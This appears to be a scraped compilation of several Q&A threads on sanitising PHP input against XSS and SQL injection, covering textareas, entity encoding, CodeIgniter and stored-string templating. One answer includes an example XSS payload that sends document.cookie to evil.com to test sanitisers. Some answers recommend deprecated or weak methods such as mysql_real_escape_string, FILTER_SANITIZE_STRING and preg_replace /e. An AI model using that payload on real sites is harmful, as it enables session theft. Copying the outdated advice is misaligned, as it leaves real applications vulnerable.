What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?
For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.
When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
) and cause problems.
Thanks!
I think i would prefer a combo of filter_var and url_decode if you want to use a pure simple php Solution
Reason
Imagine an impute like this
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
If i use strip_tags
var_dump(strip_tags($maliciousCode));
Output
string 'document.write("' (length=16)
if i use htmlspecialchars
var_dump(htmlspecialchars($maliciousCode));
Output
string '<script>document.write("<img src='http://evil.com/?cookies='"+document.cookie+"' style='display:none;' />");</script> I love PHP' (length=166)
My Choice
function cleanData($str) {
$str = urldecode ($str );
$str = filter_var($str, FILTER_SANITIZE_STRING);
$str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
return $str ;
}
$input = cleanData ( $maliciousCode );
var_dump($input);
Output
string 'document.write(""); I love PHP' (length=46)
If form is using GET instead of POST some can till escape if it is url encoded , you are able to get a minimal information and make sure the final text is harmless
The are also enough class online to help you do filter see
http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
http://htmlpurifier.org/
HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.
After getting a dirty spammer on my contact form I expanded my function that sanitizes textbox user input.It now also covers multi-line textarea input
I needed to format for normal display and also html email from my contact page.
It also gives option to format for a plain text email which I also use.
function clean_text($text, $html = true)
{ if($text == ""){return "";}
$text = nl2br($text,false); // false gives <br>, true gives <br />
$textary = explode("<br>",$text);
foreach($textary as $key => $val)
{ $val = trim($val);
$val = stripslashes($val);
$val = htmlspecialchars($val);
$textary[$key] = $val;
}
if ($html)
{ return implode("<br />",$textary);} //return implode("<br>",$textary);
else
{ return implode("\r\n",$textary);}
}
By the way... Thanks SO members for being part of my learning PHP.
Example at http://www.microcal.ca/scripts/cleantext.php
Related
The standard way of sanitizing input would be to use commands such as
$url = preg_replace('|[^a-z0-9-~+_.?#=!&;,/:%#$\|*\'()\\x80-\\xff]|i', '', $url);
$strip = array('%0d', '%0a', '%0D', '%0A');
preg_replace("/[^A-Za-z0-9 ]/", '', $string);
echo htmlentities($str);
However, I like it when my users are able to use nice things like parentheses, carats, quotes, etc in their inputs, comments/usernames/etcetc. Since HTML renders codes such as ( into symbols such as (, I was hoping to use this alternative approach to sanitizing their input.
Before I embarked on writing a function to do this for possibly harmful characters such as ( or ; or < (so injections such as sneaky eval() or <text/javascript> would not work) I tried searching up previous people's attempts at doing this type of sanitization.
I found none.
This makes me think that I must be clearly overlooking some incredibly obvious security flaw in my "creative" sanitization method.
I will not be using this function as the primary way to protect my mySQL database. I have the new mysqli class for that. Adding this sanitization overtop of the mysqli separation of input & query seems like a nice idea, though.
I am using a completely different function to clean up URLs. Those require a different approach.
This function will be used for user input to be displayed on the page, though.
So .... what could I possibly be missing? I KNOW there's gotta be something wrong with this idea since no one else uses it, right?! Is it possible to "re-render the rendered text" or something else horrific and obvious? My pretty little function so far:
Takes input strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
function santitize_data($data) {
//explode the string
//do a replacement for each character separately. Only do one replacement.
//dont do it with preg_replace because that function searches through a string in multiple passes
//and replaces already-replaced characters, resulting in horrific mishmash.
//put it back together with + signs iterating through array variables
$patterns = array();
$patterns[0] = "'";
$patterns[1] = '"';
$patterns[2] = '!';
$patterns[3] = '\\';
$patterns[4] = '#';
$patterns[5] = '%';
$patterns[6] = '&';
$patterns[7] = '$';
$patterns[8] = '(';
$patterns[9] = ')';
$patterns[10] = '/';
$patterns[11] = ':';
$patterns[12] = ';';
$patterns[13] = '|';
$patterns[14] = '<';
$patterns[15] = '>';
$patterns[16] = '{';
$patterns[17] = '}';
$replacements = array();
$replacements[0] = ''';
$replacements[1] = '"';
$replacements[2] = '!';
$replacements[3] = '\';
$replacements[4] = '#';
$replacements[5] = '%';
$replacements[6] = '&';
$replacements[7] = '$';
$replacements[8] = '(';
$replacements[9] = ')';
$replacements[10] = '/';
$replacements[11] = ':';
$replacements[12] = ';';
$replacements[13] = '|';
$replacements[14] = '<';
$replacements[15] = '>';
$replacements[16] = '{';
$replacements[17] = '}';
$split_data = str_split($data);
foreach ($split_data as &$value) {
for ($i=0; $i<17; $i++){
//testing
//echo '<br> i='.$i.' value='.$value.' patterns[i]='.$patterns[$i].' replacements[i]='.$replacements[$i].'<br>';
if ($value == $patterns[$i]) {
$value = $replacements[$i];
$i=17; } } }
unset($value); // break the reference with the last element
$data = implode($split_data);
//a bit of commented out code .. was using what seemed more logical before ... preg_replace .. but it parses the string in multiple passes ):
//$data = preg_replace($patterns, $replacements, $data);
return $data;
} //---END function definition of santitize_data
Spits out result strings like meep';) drop table or
alert(eval('document.body.inne' + 'rHTML'));
and the user sees these things rendered in the browser like like meep';) drop table and
alert(eval('document.body.inne' + 'rHTML'));
Without analyzing your code I can tell you that there is a high probability that you've overlooked something that an attacker could use to inject their own code.
The main threat here is XSS - you shouldn't need to "sanitize" to insert data into a database. You either use parameterised queries or you correctly encode characters that the database query language confers special meaning to at the point of entry into your database (e.g. ' character). XSS is normally dealt with by encoding at the point of output, however if you want to allow rich text then you need to take a different approach which is what I believe you are looking to achieve here.
Remember there is no magic function that sanitizes input in a generic manner - it very much depends on how and where it is used to determine whether it is safe or not in that context. (This bit added so if anyone searches and finds this answer then they are up to speed - I think you're already on top of this though.)
Complexity is the main enemy of security. If you cannot determine whether your code is safe or not it is too complicated and a sufficiently motivated attacker with enough time will find a way round your sanitization methods.
What can you do about this?
If you want to allow your users to enter rich text you could either allow BBCode to allow users to insert a limited, safe subset of HTML via your own conversion functions or you could allow HTML entry and run the content through a tried and tested solution such as HTML Purifier. Now, HTML Purifier won't be perfect and I'm sure that (another) flaw will be found in it at some point in the future.
How to guard against this?
If you implement a Content Security Policy on your site, this will prevent any successfully injected script code from executing in the browser. See here for current browser support for CSP. Don't be tempted to just use one of these methods - a good security model has layered security so if one control is circumvented, the other can catch it.
Google have now implemented CSP in Gmail to ensure any HTML email received cannot try anything sneaky to launch an XSS attack.
This question already has answers here:
Closed 10 years ago.
Possible Duplicate:
Best way to prevent SQL Injection in PHP
On my site I have some HTML contents that a user sometimes must save in database. What is the safe way to do this (I don't want my database to be in danger, or users who will see that code later, called from database).
So what I have read is:
Use htmlentities to save data in database, and html_entity_decode to decode data from database. Is this safe enough, or should I use something else?
Provided you're using string escaping and/or prepared statements, HTML markup can't cause any damage to your database. The danger with HTML markup comes when you display it to the user, as if someone has injected unsavory HTML into the markup you're going to display then you've got an XSS attack on your hands.
If you're not escaping or using prepared statements, then pretty much any data that comes from outside can be dangerous.
You might want to look at the PHP function mysql_real_escape_string() ... More in this post: strip_tags enough to remove HTML from string?
Here's an example ...
// scrub string ... call with sanitize($blah,1) to allow HTML
function sanitize( $val, $html=0 ) {
if (is_array($val)) {
foreach ($val as $k=>$v) $val[$k] = sanitize($v, $html);
return $val;
} else {
$val = trim( $val );
if (!$html) {
$val = strip_tags($val);
$pat = array("\r\n", "\n\r", "\n", "\r");
$val = str_replace($pat, '<br>', $val); // newlines to <br>
$pat = array('/^\s+/', '/\s{2,}/', '/\s+\$/');
$rep = array('', ' ', '');
$val = preg_replace($pat, $rep, $val); // remove multiple whitespaces
}
return mysql_real_escape_string($val); // escape stuff
}
}
I have a function which cleans users input. After the clean input is returned, it goes through json_decode($var, true); Currently, I'm getting an error of malformed string. Though, if I print it out and test with it http://jsonlint.com/, it passes. I've come to realize that the string after the cleansing processes is 149chars long, and before, its 85. To fix this, I also ran it through a regex to remove special characters, but I'm thinking that may undo what the previous function did. Does the "new" function undo what filer_var does? Is this the best way to clean input? Below is my code:
#index.php
$cleanInput = cleanse->cleanInput($_POST);
#cleanse.php OLD
function cleanInput($input){
foreach($input as $key => $value){
$cleanInput[$key] = filter_var($value, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH));
}
return($cleanInput); //Returns 149char long string, visually 85chars
}
#cleanse.php NEW
function cleanInput($input){
foreach($input as $key => $value){
$cleanInput[$key] = preg_replace("[^+A-Za-z0-9]", "", filter_var($value, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH)));
}
return($cleanInput); //Returns 85char long string, visually 85chars
}
#outputs
#Before
{"name":"Pete Johnson","address":"123 main street","email":"myemail#gmail.com","password":"PA$$word"}
#After
{"name":"Pete Johnson","address":"123 main street","email":"myemail#gmail.com","password":"PA$$word"}
The function call to filter_var($value, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH) creates an output like this:
{"name":"Pete Johnson","address":"123 mainstreet","email":"myemail#gmail.com","password":"PA$$word"}
That is why json_decode does not work.
Like I said in the comments. Your best bet is to use json_decode on the input initially and then run through the individual elements with HTML_Purifier and or Zend_Validator or write your own to deal with individual fields. For example, email has different validation requirements than password.
EDIT:
I tried running through the new function, but I couldn't get it to work is. So I made a few adjustments to get it to work. Although I'm not sure if that was what you intended for your regex. Here is what I got as output from the this code:
$input = '{"name":"Pete Johnson","address":"123 main street","email":"myemail#gmail.com","password":"PA$$word"}';
$cleanedInput = preg_replace("/[^+A-Za-z0-9]/", "", filter_var($input, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_HIGH));
echo $cleanedInput;
Output:
34name3434PeteJohnson3434address3434123mainstreet3434email3434myemailgmailcom3434password3434PAword34
How do you remove ALL HTML tags with codeigniter? im guessing you would have to use the PHP function strip_tags, but I wanted something like the global setting for XSS filtering
Thanks
If you're referring to using the input methods, Yes, you could technically open up system/libraries/Input.php, head down to this code:
/**
* Clean Input Data
*
* This is a helper function. It escapes data and
* standardizes newline characters to \n
*
* #access private
* #param string
* #return string
*/
function _clean_input_data($str)
{
if (is_array($str))
{
$new_array = array();
foreach ($str as $key => $val)
{
$new_array[$this->_clean_input_keys($key)] = $this->_clean_input_data($val);
}
return $new_array;
}
// We strip slashes if magic quotes is on to keep things consistent
if (get_magic_quotes_gpc())
{
$str = stripslashes($str);
}
// Should we filter the input data?
if ($this->use_xss_clean === TRUE)
{
$str = $this->xss_clean($str);
}
// Standardize newlines
if (strpos($str, "\r") !== FALSE)
{
$str = str_replace(array("\r\n", "\r"), "\n", $str);
}
return $str;
}
And right after the xss clean, you could put your own filtering function like so:
// Should we filter the input data?
if ($this->use_xss_clean === TRUE)
{
$str = $this->xss_clean($str);
}
$str = strip_tags($str);
However this means that everytime you update CodeIgniter, you will have to make this change again. Also since this does all of this globally, it won't make sense if the value you're getting back is, say for example, numeric. Because of these reasons
Now for an alternative solution, you can use the CodeIgniter Form Validation library, which let's you set custom rules for fields, including php functions that can accept one argument, such as strip_tags:
$this->form_validation->set_rules('usertext', 'User Text', 'required|strip_tags');
I'm not sure what the circumstances are, so I'll let you decide which path to take, but in general I recommend handling data validation on a per case basis, since in a majority of cases the validation on the data is unique.
This is what I use when I want to eliminate XSS, HTML and still preserve the user post content (even malicious code attempts)
private function stripHTMLtags($str)
{
$t = preg_replace('/<[^<|>]+?>/', '', htmlspecialchars_decode($str));
$t = htmlentities($t, ENT_QUOTES, "UTF-8");
return $t;
}
The first regex remove everything that has a html format and the htmlentities takes care of quotes and stuff.
Use it on your controller everytime you need to REALLY clean things up. Fast and simple.
Eg., this very malicious str with lots of codes tags and stuff
Just another post (http://codeigniter.com) blablabla text blabla:</p>1 from users; update users set password = 'password'; select * <div class="codeblock">[aça]<code><span style="color: rgb(221, 0, 0);">'username'</span><span style="color: rgb(0, 119, 0);">); </span><span style="color: rgb(255, 128, 0);">// filtered<br></span><span style="color: rgb(0, 0, 187);">- HELLO I'm a text with "-dashes_" and stuff '!!!?!?!?!$password </span></span>
<ok.>
Becomes
Just another post (http://codeigniter.com) blablabla text blabla:1 from users; update users set password = 'password'; select * [aça]'username'); // filtered- HELLO I'm a text with "-dashes_" and stuff '!!!?!?!?!$password <ok.>
It still have the code, but that won't do anything on your db.
Use it like
$this->stripHTMLtags($this->input->post('html_text'));
You can put this function inside a library so you don't have to hack CI :)
For reasons I'd rather not get into right now, I have a string like so:
<div>$title</div>
that gets stored in a database using mysql_real_escape_string.
During normal script execution, that string gets parsed and stored in a variable $string and then gets sent to a function($string).
In this function, I am trying to:
function test($string){
$title = 'please print';
echo $string;
}
//I want the outcome to be <div>please print</div>
This seems like the silliest thing, but for the life of me, I cannot get it to "interpret" the variables.
I've also tried,
echo html_entity_decode($string);
echo bin2hex(html_entity_decode($string)); //Just to see what php was actually seeing I thought maybe the $ had a slash on it or something.
I decided to post on here when my mind kept drifting to using EVAL().
This is just pseudocode, of course. What is the best way to approach this?
Your example is a bit abstract. But it seems like you could do pretty much what the template engines do for these case:
function test($string){
$title = 'please print';
$vars = get_defined_vars();
$string = preg_replace('/[$](\w{3,20})/e', '$vars["$1"]', $string);
echo $string;
}
Now actually, /e is pretty much the same as using eval. But at least this only replaces actual variable names. Could be made a bit more sophisticated still.
I don't think there is a way to get that to work. You are trying something like this:
$var = "cute text";
echo 'this is $var';
The single quotes are preventing the interpreter from looking for variables in the string. And it is the same, when you echo a string variable.
The solution will be a simple str_replace.
echo str_replace('$title', $title, $string);
But in this case I really suggest Template variables that are unique in your text.
You just don't do that, a variable is a living thing, it's against its nature to store it like that, flat and dead in a string in the database.
If you want to replace some parts of a string with the content of a variable, use sprintf().
Example
$stringFromTheDb = '<div>%s is not %s</div>';
Then use it with:
$finalString = sprintf($stringFromTheDb, 'this', 'that');
echo $finalString;
will result in:
<div>this is not that</div>
If you know that the variable inside the div is $title, you can str_replace it.
function test($string){
$title = 'please print';
echo str_replace('$title', $title, $string);
}
If you don't know the variables in the string, you can use a regex to get them (I used the regex from the PHP manual).
function test($string){
$title = 'please print';
$vars = '/(?<=\$)[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/';
preg_match_all($vars, $string, $replace);
foreach($replace[0] as $r){
$string = str_replace('$'.$r, $$r, $string);
}
echo $string;
}